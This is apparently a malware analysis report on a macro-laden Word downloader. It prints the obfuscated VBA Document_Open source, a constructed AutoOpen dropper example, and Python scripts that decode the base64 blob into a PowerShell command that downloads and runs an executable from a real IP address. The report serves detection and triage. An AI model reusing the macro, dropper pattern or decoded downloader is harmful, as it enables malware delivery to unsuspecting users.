MALICIOUS
Risk score: 224

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample contains VBA macros, including a Document_Open handler that runs as soon as the document is opened with macros enabled. The handler builds one long string from six hard-coded fragments, surrounded by filler: arrays of random strings that are indexed once and discarded, and `If Len("...") <> N` conditions whose outcome is fixed at write time, so the MsgBox in each Else branch never executes. The finished string is passed to a helper Sub (`sex`, cut off in the preview), and the heuristics report a Shell() call in the macro code; the pattern is a downloader that decodes the blob and runs it as a command. The blob is base64 applied twice, so it can be decoded statically without executing the macro. ClamAV's signature Doc.Macro.Obfuscation-6332451-0 flags the document as a macro-obfuscation family. The only URL extracted from the document body, http://schemas.openxmlformats.org/drawingml/2006/main, is the DrawingML namespace URI found in ordinary Office files and is not a network indicator; the actual download URL is inside the encoded blob.
Heuristics (7)

- ClamAV detection (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): the macro code calls Shell(), which runs an arbitrary command line.
- Document_Open macro (high, OLE_VBA_DOCOPEN): a Document_Open handler runs automatically when the document is opened; the only user interaction needed is enabling macros.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches documents whose macro source has been stripped (p-code only, so-called VBA stomping) or could not be extracted, where the visible source is unavailable and the compiled stream is the only thing left to inspect.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI present in most modern Office files and is not a network indicator.
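The OLE_VBA_* findings above are the kind of static checks a triage script runs over extracted macro source. Below is an added example (not the analyzer's own code) that approximates them in Python: it looks for auto-execution entry points, process-launch and download tokens, long base64-like string literals, dead `If Len("...") <> N` branches and throwaway string arrays, then rates the combination. It runs over a constructed excerpt of this sample's Document_Open (copied from the preview further down the page, with most fragment lines omitted for brevity) plus two constructed macros, a benign one and a generic dropper. The token lists, the 64-character blob threshold and the verdict rules are assumptions. It works on decoded source only; the report's p-code check applies the same token idea to the compiled stream, which this example does not parse.

```python
import re

# Auto-execution entry points. Assumed list in the spirit of olevba's AutoExec
# table; Document_Open is the one the report's OLE_VBA_DOCOPEN finding keys on.
AUTOEXEC = re.compile(
    r"\bSub\s+(Auto_?Open|Document_Open|Workbook_Open|Auto_?Close|"
    r"Document_Close|Workbook_Activate)\b", re.I)
# Tokens that start a process (what OLE_VBA_SHELL keys on) or fetch data.
# WScript.Shell is listed before Shell so the longer match wins.
EXEC_TOKENS = re.compile(
    r"\b(WScript\.Shell|ShellExecute|Shell|CreateObject|Exec|Run|powershell|cmd)\b", re.I)
DOWNLOAD_TOKENS = re.compile(
    r"\b(URLDownloadToFile|XMLHTTP|WinHttp\w*|DownloadFile|Navigate|ADODB\.Stream)\b", re.I)
# A string literal made only of base64-alphabet characters. The length
# threshold is an assumption; the report does not state its own.
MIN_BLOB = 64
B64_BLOB = re.compile(r'"([A-Za-z0-9+/]{%d,}={0,2})"' % MIN_BLOB)
# If Len("constant") <> N Then: decided when the macro was written, so one
# branch is filler that exists only to pad the code.
DEAD_BRANCH = re.compile(r'\bIf\s+Len\("[^"]*"\)\s*<>\s*\d+\s+Then\b', re.I)
# Arrays of random strings that are indexed once and never used again.
JUNK_ARRAY = re.compile(r'=\s*Array\("')


def triage(src):
    """Collect the indicators found in one VBA source text and rate them."""
    blobs = B64_BLOB.findall(src)
    found = {
        "autoexec": [m.group(1) for m in AUTOEXEC.finditer(src)],
        "exec_tokens": sorted({m.group(1) for m in EXEC_TOKENS.finditer(src)}),
        "download_tokens": sorted({m.group(1) for m in DOWNLOAD_TOKENS.finditer(src)}),
        "base64_blobs": len(blobs),
        "longest_blob": max((len(b) for b in blobs), default=0),
        "dead_branches": len(DEAD_BRANCH.findall(src)),
        "junk_arrays": len(JUNK_ARRAY.findall(src)),
    }
    launches = bool(found["exec_tokens"] or found["download_tokens"])
    if found["autoexec"] and launches:
        found["verdict"] = "high"    # runs on open and can execute or download
    elif found["autoexec"] and (blobs or found["dead_branches"]):
        found["verdict"] = "medium"  # runs on open and is hiding something
    elif launches or blobs:
        found["verdict"] = "low"
    else:
        found["verdict"] = "none"
    return found


# Excerpt of this sample's Document_Open, copied from the preview on this page
# (fragment lines other than Do1GrfH omitted to keep the excerpt short).
SAMPLE_EXCERPT = r'''Sub Document_Open()
Dim HLYbC
HLYbC = Array("v4A30J", "LLc2yDwWt")
YVqjg6 = HLYbC(1)
Dim HXwDT4ovM
HXwDT4ovM = Array("PSM72pRU6", "h3mQoG6N", "Jkts1")
jrKMD = HXwDT4ovM(1)
Mn2NSqQ9 = "2N5bDdkS"
Do1GrfH = "Eo1ZXlSM1pXSmpiR2xsYm5RdVJHOTNibXh2WVdSR2FXeGxLQ1J0ZVhWeWJDNVViMU4wY21sdVp5Z3BMQ0FrY0dGMGFDazdVM1JoY25RdFVISnZZMlZ6Y3l"
If Len("t6kYxU7JB") <> 181 Then
' nlUg8r
Else
' pDEr4p
MsgBox "QtPweZ", 64, "tZXRcgV"
End If
s3jW46 = Mn2NSqQ9 & Do1GrfH & Omc0E64X
sex JMfa6ud
End Sub
'''

# Constructed control: an ordinary formatting macro with no trigger or launcher.
BENIGN_MACRO = r'''Sub FormatReport()
ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

# Constructed generic dropper (not this sample): auto-exec, download and launch.
CONSTRUCTED_DROPPER = r'''Sub AutoOpen()
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "http://example.invalid/stage2.bin", False
http.Send
Set sh = CreateObject("WScript.Shell")
sh.Run "cmd /c start " & Environ("TEMP") & "\stage2.exe", 0
End Sub
'''

if __name__ == "__main__":
    for name, src in [("sample", SAMPLE_EXCERPT), ("benign", BENIGN_MACRO),
                      ("dropper", CONSTRUCTED_DROPPER)]:
        print(name, triage(src))
```

On the excerpt the script finds the Document_Open trigger, one long blob, one dead branch and two junk arrays but no launch token, because the preview is cut off before the helper's body; that is exactly the gap the report's Shell() and p-code findings fill from the full macro stream. The constructed dropper shows the high-confidence combination (trigger plus download plus launch) that a complete sample produces.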
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19760 bytes | b91b29f4669c3774e45011ddec97f57d75fa5e547d2c6dd23b3f451322b9684a | ClamAV: no threats found for the extracted source on its own (the Doc.Macro.Obfuscation signature above fired on the parent document). Obfuscation or payload: likely; the carved artifact contains 1 long base64-like blob. |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim HLYbC
HLYbC = Array("v4A30J", "LLc2yDwWt")
YVqjg6 = HLYbC(1)
Dim HXwDT4ovM
HXwDT4ovM = Array("PSM72pRU6", "h3mQoG6N", "Jkts1")
jrKMD = HXwDT4ovM(1)
Mn2NSqQ9 = "2N5bDdkS"
Do1GrfH = "Eo1ZXlSM1pXSmpiR2xsYm5RdVJHOTNibXh2WVdSR2FXeGxLQ1J0ZVhWeWJDNVViMU4wY21sdVp5Z3BMQ0FrY0dGMGFDazdVM1JoY25RdFVISnZZMlZ6Y3l"
Omc0E64X = "Ba2NHRjBhRHRpY21WaGF6dDlZMkYwWTJoN2ZYMD0="
If Len("t6kYxU7JB") <> 181 Then
' nlUg8r
Else
' pDEr4p
MsgBox "QtPweZ", 64, "tZXRcgV"
End If
Dim LRExe5
LRExe5 = Array("fHRkT8")
eYduk = LRExe5(0)
Dim FYk6q
FYk6q = Array("KpMQTwaye")
BtX8d2SCg = FYk6q(0)
Dim s3jW46
s3jW46 = Mn2NSqQ9 & Do1GrfH & Omc0E64X
CrvN6j = "WTIxa0lDOXJJSE5sZENCZlVFOVhSVkk5Y0c5M1pYSW1KaUJ6WlhRZ"
YKCs2LQqg = "1gxTklSVXhNUFhOb1pXeHNKaVlnWTJGc2JDQWxYMUJQVjBWU0pTVmZVMGhGVEV3bElDUjNaV0pqYkdsbGJuUWdQU0J1WlhjdGIySnFaV04w"
zG1aO = "SUZONWMzUmxiUzVPWlhRdVYyVmlRMnhwWlc1ME95UnRlWFZ5YkhNZ1BTQW5hSFIwY0Rvdkx6RTVNUzQ1Tmk0eU5Ea3VNakF4TDNCakxuVndKeTVUY0d4cGRDZ25MQ2NwT3lSd1lYUm9JRDBnSkdWdWRqcDBaVzF3SUNzZ0oxeCtkRzF3TG1WNFpTYzdabTl5WldGamFDZ2tiWGwxY213Z2FXNGdKRzE1ZFhKc"
Dim zbuKhV
zbuKhV = Array("qcU5w")
z3BRsK0 = zbuKhV(0)
If Len("wdaUs8fI") <> 163 Then
' TzUP3HdR
Else
' P8gGo
MsgBox "RWELQb7", 22, "ljeOY"
End If
Dim iZvYI
iZvYI = Array("fby2jtv")
DuGhMpJ = iZvYI(0)
Dim zbeIcwkdV
zbeIcwkdV = Array("oIw1oOsM", "ocGLh")
KJfKcUdHO = zbeIcwkdV(1)
Dim u4Yg53X1s
u4Yg53X1s = CrvN6j & YKCs2LQqg & zG1aO
Dim j8FWPm
j8FWPm = Array("lWKIYk")
wlqbJ = j8FWPm(0)
JMfa6ud = u4Yg53X1s & s3jW46
Dim H0FCE
H0FCE = Array("UUKvzhE")
v9hXK = H0FCE(0)
Dim VYVIFXTi
VYVIFXTi = Array("mEBneI", "g1Ovt")
OxhT4Y58H = VYVIFXTi(0)
Dim wL27osq
wL27osq = Array("ZQ5H4yi", "MgPsKLy9")
Zkts6 = wL27osq(1)
Dim XAcn2SBEo
XAcn2SBEo = Array("cHGFt5MTg", "G6Zau2Jwo")
bI3MKsQ9 = XAcn2SBEo(1)
Dim oc1jSvk
oc1jSvk = Array("HIBfgm", "TpGL5y9", "Ec7QsJL")
Osp29 = oc1jSvk(2)
Dim IEKb5
IEKb5 = Array("pOjSQr2UH")
cHglGXfE = IEKb5(0)
sex JMfa6ud
End Sub
Attribute VB_Name = "xpQq2"
Sub sex(nGNz4H)
Dim bIFTSvJg
bIFTSvJg = Array("L5yAmY4Oh", "kaU1Ep")
T3ntfQd = bIFTSvJg(1)
Dim DBCtW
DBCtW = Array("TfOdBN7E", "RctJ74OT")
EB7XGUyMj = DBCtW(1)
Dim ZJoZeF8t
ZJoZeF8t = Array("dWbdD", "FpBmcQ", "NrkKR")
pJiHW = ZJoZeF8t(0)
If Len("iXrQv") <> 251 Then
' orlu6Dbo
Else
' q6ky5wl
MsgBox "rvMTG", 50, "LeOBD"
End If
Dim zgZlT
zgZlT = Array("m7D12Nz", "NjfFE5C6")
p5vidNfE1 = zgZlT(1)
Dim xIBwZnMy6
xIBwZnMy6 = Array("K1HasfM")
W8WYe = xIBwZnMy6(0)
Dim gf52o
gf52o = Array("eTrtI", "Xikqz3JFg")
n3YPdX = gf52o(0)
Dim Q83ASoq
Q83ASoq = Array("sBALHq", "NkD0cif")
IAxXa = Q83ASoq(0)
Dim xholxz1Z
xholxz1Z = Array("LJDOerbzp", "Lq4kX", "vOQJgpjlI")
iGMao = xholxz1Z(1)
Dim TSNMZCy
TSNMZCy = Array("RBVLW0D")
fsoZVGmQR = TSNMZCy(0)
Dim Tnhw5d
Tnhw5d = Array("oLJn68cQ", "DEtAdZDlH")
CdAZxnEjm = Tnhw5d(1)
Dim wd1Cj
wd1Cj = Array("WLPaTOc2", "pBxpL", "tgJ9dV")
c8WAh = wd1Cj(1)
Dim ivDxB
ivDxB = Array("c9DJ14Oo")
e5hjsW = ivDxB(0)
Dim pRQNr0
pRQNr0 = Array("j9OxlJk", "J8FUlcLKo")
TtLzjPuIS = pRQNr0(1)
Dim xzg5T
xzg5T = Array("YtgiTZlU", "a9oaAJ6CU")
a6vo2 = xzg5T(1)
Dim s9vUx
s9vUx = Array("V6YHX", "vb4gQeDM9")
zawNfYeB = s9vUx(1)
If Len("OeiEkS6A") <> 226 Then
' dRvXf9Ed8
Else
' SveSz
MsgBox "cfSdt", 43, "qMq5SP"
End If
Dim VVHpXrYz
VVHpXrYz = Array("rlXe1IR", "bUFJ2Oca", "rOC3kKT")
Ga2PMWHl = VVHpXrYz(2)
If Len("yLUp6t3mq") <> 189 Then
' u3t6Zf
Else
' RDkLjVPx
MsgBox "Z4OqCwWhr", 17, "Wqnxspb"
End If
Dim hlq75wdht
hlq75wdht = Array("zWlqUAa", "p23C9fFA5", "bAM1OP")
AnkQGD2Bx = hlq75wdht(0)
Dim SD9YWAo
SD9YWAo = Array("khmWqgLU6", "n3u7IQ")
GCwgis = SD9YWAo(0)
Dim omTJlb
omTJlb = Array("lDtT10fk4", "DzhUQvc0", "xKHYvlJ")
bY3a1cfiE = omTJlb(0)
Dim djVBa
djVBa = Array("DkrtEc")
KLB0Z = djVBa
... (truncated)
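The blob assembled in Document_Open can be recovered offline without running the macro. The script below is an added example (not part of the report or of the sample): it joins the six string fragments quoted in the preview in the order the macro concatenates them (`u4Yg53X1s & s3jW46`), decodes the result as base64 twice, and expands the `%_POWER%%_SHELL%` splice the way cmd.exe would. It assumes the fragment values shown in the preview are complete. The helper Sub `sex` that receives the string is cut off in the preview, so the exact decode-and-Shell() step the heuristics report is not visible here; the script only reproduces what the string contains.

```python
import base64
import re

# The six string fragments, copied verbatim from the Document_Open preview
# above, in the order the macro joins them:
#   u4Yg53X1s = CrvN6j & YKCs2LQqg & zG1aO
#   s3jW46    = Mn2NSqQ9 & Do1GrfH & Omc0E64X
#   JMfa6ud   = u4Yg53X1s & s3jW46
FRAGMENTS = [
    # CrvN6j
    "WTIxa0lDOXJJSE5sZENCZlVFOVhSVkk5Y0c5M1pYSW1KaUJ6WlhRZ",
    # YKCs2LQqg
    "1gxTklSVXhNUFhOb1pXeHNKaVlnWTJGc2JDQWxYMUJQVjBWU0pTVmZVMGhGVEV3bElDUjNaV0pqYkdsbGJuUWdQU0J1WlhjdGIySnFaV04w",
    # zG1aO
    "SUZONWMzUmxiUzVPWlhRdVYyVmlRMnhwWlc1ME95UnRlWFZ5YkhNZ1BTQW5hSFIwY0Rvdkx6RTVNUzQ1Tmk0eU5Ea3VNakF4TDNCakxuVndKeTVUY0d4cGRDZ25MQ2NwT3lSd1lYUm9JRDBnSkdWdWRqcDBaVzF3SUNzZ0oxeCtkRzF3TG1WNFpTYzdabTl5WldGamFDZ2tiWGwxY213Z2FXNGdKRzE1ZFhKc",
    # Mn2NSqQ9
    "2N5bDdkS",
    # Do1GrfH
    "Eo1ZXlSM1pXSmpiR2xsYm5RdVJHOTNibXh2WVdSR2FXeGxLQ1J0ZVhWeWJDNVViMU4wY21sdVp5Z3BMQ0FrY0dGMGFDazdVM1JoY25RdFVISnZZMlZ6Y3l",
    # Omc0E64X
    "Ba2NHRjBhRHRpY21WaGF6dDlZMkYwWTJoN2ZYMD0=",
]


def assemble_blob():
    """Replay the macro's concatenation. The junk arrays, MsgBox calls and
    If/Else filler around it contribute nothing to the result."""
    return "".join(FRAGMENTS)


def decode_twice(blob):
    """The blob is base64 applied twice: the first decode yields another
    base64 string, the second yields the plaintext command line."""
    inner = base64.b64decode(blob, validate=True).decode("ascii")
    return base64.b64decode(inner, validate=True).decode("ascii")


def expand_cmd_vars(command):
    """Resolve `set NAME=VALUE&&` assignments and `%NAME%` references the way
    cmd.exe does, so the interpreter name spliced from two variables is
    readable. Unknown variables are left as written."""
    env = dict(re.findall(r"\bset (\w+)=([^&]*)&&", command))
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1), m.group(0)), command)


def extract_urls(text):
    """Pull http(s) URLs out of the decoded command for IOC handling."""
    return re.findall(r"https?://[^\s'\"]+", text)


if __name__ == "__main__":
    cmd = decode_twice(assemble_blob())
    print(cmd)
    print("expanded:", expand_cmd_vars(cmd))
    print("urls:", extract_urls(cmd))
```

Running it prints a 311-character cmd.exe one-liner. Two `set` assignments build the word `powershell` from `%_POWER%%_SHELL%`, so the interpreter name never appears literally in the macro or in either base64 layer, which defeats naive string matching on "powershell". The PowerShell body creates a System.Net.WebClient, downloads http://191.96.249.201/pc.up into `$env:temp` as `~tmp.exe`, starts it, and swallows any error in a try/catch. The IP, the URL path and the dropped file name are the indicators to pivot on; the random string arrays, the MsgBox calls and the `If Len(...) <> N` branches in the macro are noise, since every one of those conditions is true and the Else branch holding the MsgBox never runs.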